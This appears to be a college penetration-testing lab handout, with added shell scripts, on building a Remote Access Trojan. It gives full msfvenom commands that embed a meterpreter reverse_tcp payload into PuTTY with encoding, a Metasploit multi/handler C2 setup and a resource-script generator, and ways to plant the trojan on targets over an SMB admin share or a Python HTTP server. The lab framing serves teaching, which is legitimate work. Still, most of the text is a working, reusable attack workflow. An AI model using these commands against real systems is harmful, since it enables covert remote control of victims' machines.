[Lab-Pentest] Metasploit RAT



Madison Area Technical College, Madison
Computer Science
Dec 6, 2023
Uploaded by LavonCN on coursehero.com

Introduction

A Remote Access Trojan (RAT) is an application that attackers use to covertly control a targeted machine. In this lab we use msfvenom to create a RAT. We then use msfconsole to start a handler that receives the incoming connection from the RAT and lets us interact with the targeted machine. For this lab, Windows Server 2008 R2 and Windows 10 are the target systems; the Kali Linux machine is the attacker.

There are three stages to this type of attack. First, we create a malicious executable. Next, we deploy the RAT to the target machine. Finally, we wait for the target to connect back to the attacking system.

Background

The following sections provide information about your payloads.

32-bit or 64-bit

The sample executable could be compiled as either a 32-bit or 64-bit application. If we build our trojan for the wrong architecture, our backdoor will not work. The Windows PE (Portable Executable) format defines many machine types, but we are only concerned with two:

    Constant                   Value    Bytes on disk   Description
    IMAGE_FILE_MACHINE_AMD64   0x8664   64 86           x64
    IMAGE_FILE_MACHINE_I386    0x14c    4c 01           Intel 386 or later processors and compatible processors

The Machine field is stored little-endian, which is why 0x8664 appears in a hex dump as the byte sequence 64 86 and 0x14c as 4c 01.

We need to check whether the executable we downloaded is 64-bit or 32-bit. A quick and easy way to do this is with hexdump (already installed on Kali Linux):

    hexdump -C -n 200 <base file>.exe

What we are looking for is the line that contains the letters "PE". Note: the PE header does not sit at a fixed offset. Its position is stored as a 4-byte little-endian value at file offset 0x3C (the e_lfanew field of the DOS header), and on many executables it lies beyond the first 200 bytes. If you do not see "PE" in the output, increase the -n value (for example -n 512) or drop it and page through the output.
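As an added example (not part of the lab handout), the following shell function performs the same check without guessing where the PE header falls in the hexdump output: it reads e_lfanew from offset 0x3C, verifies the PE\0\0 signature at that offset, and decodes the Machine field against the two values in the table above. It uses od rather than hexdump because od can skip to an arbitrary offset and print a single little-endian word; it therefore assumes a little-endian host such as an x86-64 Kali box. The make_fake_pe helper and the temporary files it writes are constructed test inputs (minimal headers, not runnable programs) so that the example works offline; on Kali you would simply run pe_arch against putty-64.exe or putty-32.exe.

```shell
#!/bin/sh
# Added example, not from the lab handout: report a PE file's Machine type by
# following e_lfanew instead of eyeballing hexdump output.
# Assumes GNU/BSD coreutils (od, head, mktemp) on a little-endian host.

# pe_arch FILE -> prints x86, x64 or unknown:<hex>; returns 1 if FILE is not a PE
pe_arch() {
    f="$1"
    # DOS header starts with the "MZ" magic (4d 5a)
    mz=$(od -An -t x1 -N 2 "$f" 2>/dev/null | tr -d ' \n')
    [ "$mz" = "4d5a" ] || { echo "not a PE: missing MZ magic" >&2; return 1; }
    # e_lfanew: 4-byte little-endian offset of the PE header, at file offset 0x3C (60)
    pe_off=$(od -An -t u4 -j 60 -N 4 "$f" 2>/dev/null | tr -d ' \n')
    [ -n "$pe_off" ] || { echo "not a PE: file too short for e_lfanew" >&2; return 1; }
    # The PE signature "PE\0\0" (50 45 00 00) must sit exactly at e_lfanew
    sig=$(od -An -t x1 -j "$pe_off" -N 4 "$f" 2>/dev/null | tr -d ' \n')
    [ "$sig" = "50450000" ] || { echo "not a PE: bad signature at offset $pe_off" >&2; return 1; }
    # COFF header follows the signature; its first field is the 2-byte LE Machine type
    machine=$(od -An -t x2 -j $((pe_off + 4)) -N 2 "$f" 2>/dev/null | tr -d ' \n')
    case "$machine" in
        8664) echo x64 ;;                 # IMAGE_FILE_MACHINE_AMD64, bytes 64 86 on disk
        014c) echo x86 ;;                 # IMAGE_FILE_MACHINE_I386,  bytes 4c 01 on disk
        *)    echo "unknown:$machine" ;;
    esac
}

# make_fake_pe OUT MACHINE_OCTAL_ESCAPES: constructed test input, not a real program.
# Writes "MZ", an e_lfanew of 0x80, then "PE\0\0" and the given Machine bytes.
make_fake_pe() {
    {
        printf 'MZ'                   # offsets 0-1
        head -c 58 /dev/zero          # offsets 2-59
        printf '\200\000\000\000'     # offsets 60-63: e_lfanew = 0x80 (little-endian)
        head -c 64 /dev/zero          # offsets 64-127: unused DOS stub
        printf 'PE\000\000'           # offsets 128-131: PE signature
        printf "$2"                   # offsets 132-133: Machine field
        head -c 18 /dev/zero          # remainder of the COFF header
    } > "$1"
}

# Demo on constructed samples (real use: pe_arch putty-64.exe)
tmp=$(mktemp -d)
make_fake_pe "$tmp/fake32.exe" '\114\001'        # 4c 01 -> IMAGE_FILE_MACHINE_I386
make_fake_pe "$tmp/fake64.exe" '\144\206'        # 64 86 -> IMAGE_FILE_MACHINE_AMD64
printf 'not a PE file\n' > "$tmp/notes.txt"
for f in "$tmp"/*; do
    printf '%s: %s\n' "$(basename "$f")" "$(pe_arch "$f" 2>/dev/null || echo 'not a PE file')"
done
rm -rf "$tmp"
```

The signature check matters: the string "PE" can occur elsewhere in a binary, so matching the bytes at e_lfanew rather than the first "PE" in a dump is what makes the result reliable.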
32-bit executable: the line that contains the letters PE will show the pattern 50 45 00 00 4c 01.

64-bit executable: the line that contains the letters PE will show the pattern 50 45 00 00 64 86.

Lab Activities

The following sections walk you through the process of building a RAT, deploying it to your target and executing it to deliver your payload.

Build the trojan into the base executable

Depending on the architecture of our target, we need to select a payload that matches. Note: the payload architecture must match the template executable. A 64-bit payload will not work inside a 32-bit template, and a 64-bit template will not run at all on 32-bit Windows. A 32-bit template does run on 64-bit Windows (under WOW64), but the session you get is a 32-bit process, so match the template and payload to the target whenever you can.

MSFVenom

MSFVenom is Metasploit's standalone payload generator. We use it when we want to make file-based Metasploit payloads. Payloads can also be created in msfconsole, but that interface lacks a few features needed for file-based executables (there is no --keep option). To keep things organized it is usually a good idea to make a dedicated directory to build your trojan executables in (you don't want to lose track of these).

To review all of the available options for a payload, execute msfvenom with the --payload-options argument (newer msfvenom releases name it --list-options):

    msfvenom --payload-options -p windows/x64/meterpreter/reverse_tcp

For this lab, the following options will be used to generate the malicious version of PuTTY.
    -a, --arch         The architecture to use
        --platform     The platform of the payload
    -p, --payload      Payload to use
    -e, --encoder      The encoder to use
    -i, --iterations   The number of times to encode the payload
    -f, --format       Output format (use --help-formats for a list)
    -x, --template     Specify a custom executable file to use as a template
    -o, --out          Save the payload to <filename>
    -k, --keep         Preserve the template behavior

For Windows x64 (64-bit). Note: you must use a 64-bit application template!

    msfvenom -a x64 --platform windows -x putty-64.exe -k -p windows/x64/meterpreter/reverse_tcp lhost= lport=31337 -f exe -o putty-backdoor.exe

For Windows x86 (32-bit). Note: you must use a 32-bit application template!

    msfvenom -a x86 --platform windows -x putty-32.exe -k -p windows/meterpreter/reverse_tcp lhost= lport=31337 -e x86/shikata_ga_nai -i 3 -f exe -o putty-backdoor.exe

Command and Control Server [C2]

We need a way to control the target system once our RAT is running on it. Metasploit Framework provides the exploit/multi/handler module for this purpose.

Metasploit Handler

The Metasploit multi-handler is a generic server whose behavior is determined by the PAYLOAD we assign to it. Here we tell it to listen on port 31337 for a windows/x64/meterpreter/reverse_tcp connection. The PAYLOAD must be the same payload that was built into the RAT: for the 32-bit build above, set PAYLOAD to windows/meterpreter/reverse_tcp instead. LHOST and LPORT must likewise match the lhost and lport values given to msfvenom.

    msf > use exploit/multi/handler
    msf exploit(multi/handler) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
    msf exploit(multi/handler) > set LHOST
    msf exploit(multi/handler) > set LPORT 31337
    msf exploit(multi/handler) > run

We are now ready to receive connections from our RAT. Next, we need to deploy the RAT to the target system.

Deploy the RAT

The following sections discuss two techniques to move your RAT onto the target system.

Using SMBClient

The smbclient utility can be used to move files onto a Windows system that exposes the SMB service. Because the C$ administrative share is used, this requires credentials for an account with administrative rights on the target. Note that this technique will not work against systems that filter inbound SMB connections (TCP 445) with a host-based firewall.

To begin, change to the directory on your Kali system that contains your malicious executables.

    [kali] cd ~/assessments/malware/

Next, connect to the target system's C$ share using the smbclient command in Kali.

    [kali] smbclient \\\\\\c$ -U Administrator
    Enter Workgroup\Administrator's password:
    smb: \>

Finally, upload your malicious executable to the target system.

    smb: \> put putty-backdoor.exe
    smb: \> exit

In general, this interaction is similar to a typical FTP transfer, the main difference being the use of SMB instead of FTP. At this point you have uploaded your malicious executable to the root of the C: drive on the Windows Server 2008 R2 target.

Using Python3's HTTP Server

At this point we have produced an executable file that we need to get onto the target machine and execute. To accomplish this we will use the HTTP server available as a Python 3 module. Ensure you are in the directory that contains the executables you generated using msfvenom and run the module. Invoke python3 explicitly: the http.server module does not exist in Python 2, which is what the bare python command may still resolve to on older Kali installs.

    [kali] cd /root/backdoors
    [kali] python3 -m http.server

By default the server listens on TCP port 8000 and serves the contents of the current directory, so the RAT becomes reachable from the target as http://<Kali IP>:8000/putty-backdoor.exe.
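Before deploying, it is worth confirming that the three places where the architecture and payload appear (the -a/-x template, the -p payload, and the handler's PAYLOAD) agree with each other, since a mismatch yields a RAT that does not work or a handler that cannot complete the session. The following shell script is an added example and not part of the lab handout: payload_arch infers the architecture from the Metasploit payload name (Metasploit puts x64 in the path of 64-bit Windows payloads), plan_rat refuses to emit the lab's msfvenom command when the payload does not match the template architecture you determined in the Background section, and write_handler_rc writes a resource script for msfconsole -r from the same payload variable so the listener cannot drift from the implant. The 10.0.0.5 address, the port and the file names are placeholders.

```shell
#!/bin/sh
# Added example, not from the lab handout: keep template arch, msfvenom payload
# and multi/handler PAYLOAD consistent. Assumes the template's arch was already
# determined (e.g. from the PE Machine field); 10.0.0.5/31337/file names are
# placeholders. Nothing here invokes msfvenom or msfconsole.

# payload_arch PAYLOAD -> x64 for windows/x64/... payloads, x86 for other
# windows/... payloads; fails for anything that is not a Windows payload.
payload_arch() {
    case "$1" in
        windows/x64/*) echo x64 ;;
        windows/*)     echo x86 ;;
        *) echo "unsupported payload: $1" >&2; return 1 ;;
    esac
}

# plan_rat TEMPLATE_ARCH PAYLOAD LHOST LPORT TEMPLATE OUT
# Prints the msfvenom command used in the lab (does not run it). Returns 1 on an
# architecture mismatch instead of handing back a command that builds a broken RAT.
plan_rat() {
    t_arch="$1"; payload="$2"; lhost="$3"; lport="$4"; template="$5"; out="$6"
    p_arch=$(payload_arch "$payload") || return 1
    if [ "$p_arch" != "$t_arch" ]; then
        echo "mismatch: payload $payload is $p_arch but template $template is $t_arch" >&2
        return 1
    fi
    cmd="msfvenom -a $t_arch --platform windows -x $template -k -p $payload LHOST=$lhost LPORT=$lport"
    # The lab encodes only the x86 build; keep that choice.
    if [ "$p_arch" = x86 ]; then
        cmd="$cmd -e x86/shikata_ga_nai -i 3"
    fi
    echo "$cmd -f exe -o $out"
}

# write_handler_rc PAYLOAD LHOST LPORT FILE
# Resource script for 'msfconsole -r FILE', fed the same PAYLOAD/LHOST/LPORT
# values as the msfvenom command so the handler always matches the implant.
# ExitOnSession false + exploit -j keeps the listener up for repeat callbacks.
write_handler_rc() {
    cat > "$4" <<EOF
use exploit/multi/handler
set PAYLOAD $1
set LHOST $2
set LPORT $3
set ExitOnSession false
exploit -j
EOF
}

# Demo with placeholder values
lhost=10.0.0.5; lport=31337
payload=windows/x64/meterpreter/reverse_tcp
plan_rat x64 "$payload" "$lhost" "$lport" putty-64.exe putty-backdoor.exe
rc=$(mktemp)                                  # real use: handler.rc, then msfconsole -r handler.rc
write_handler_rc "$payload" "$lhost" "$lport" "$rc"
cat "$rc"; rm -f "$rc"
# Wrong pairing (x86 payload, x64 template) is refused rather than built
plan_rat x64 windows/meterpreter/reverse_tcp "$lhost" "$lport" putty-64.exe putty-backdoor.exe || echo "build refused"
```

Drive both the msfvenom command and the resource script from the same payload variable, as the demo does; the mismatch the lab warns about almost always comes from editing one of them and forgetting the other.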